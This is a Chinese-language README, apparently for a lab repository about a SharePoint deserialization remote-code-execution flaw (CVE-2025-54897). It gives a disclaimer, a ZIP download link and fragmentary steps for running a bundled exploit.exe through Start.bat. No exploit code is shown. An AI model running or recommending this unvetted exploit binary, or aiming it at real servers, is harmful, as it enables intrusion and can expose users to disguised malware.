本实验室演示了 Microsoft Office SharePoint 中的一个反序列化漏洞,该漏洞可实现远程代码执行(RCE)。此问题源于 SharePoint 的对象反序列化例程对不受信任的序列化数据处理不当,允许经过身份验证的攻击者在目标服务器上执行任意代码。该漏洞的 CVSSv3 评分为 8.8,属于高危漏洞,影响多个 SharePoint 版本,包括 Enterprise Server 2016、Server 2019 和 Subscription Edition。成功利用该漏洞可能导致数据泄露、权限提升,或在网络环境中完全入侵系统。
本实验室涉及潜在有害的代码执行模拟。请仅在隔离的非生产环境中使用。未经适当授权,请勿部署到实时系统或网络。作者对因使用本仓库而产生的滥用、损害或法律后果不承担任何责任。请始终遵守道德黑客准则,并在对任何系统进行测试前获得明确许可。
仅供教育目的: 本仓库仅用于学习软件漏洞和安全编码实践。其目的并非促进未经授权的访问、攻击或任何非法活动。
通过以下链接以 ZIP 存档形式下载实验室资源:下载实验室 ZIP。
安装步骤:
C:\cve-2025-54897-lab)。dotnet --version 验证 .NET 依赖项。Start.bat 以启动 exploit.exe。这将在控制台窗口中打开利用界面。http://localhost:80)。如有问题或贡献,请发送电子邮件至 [email protected]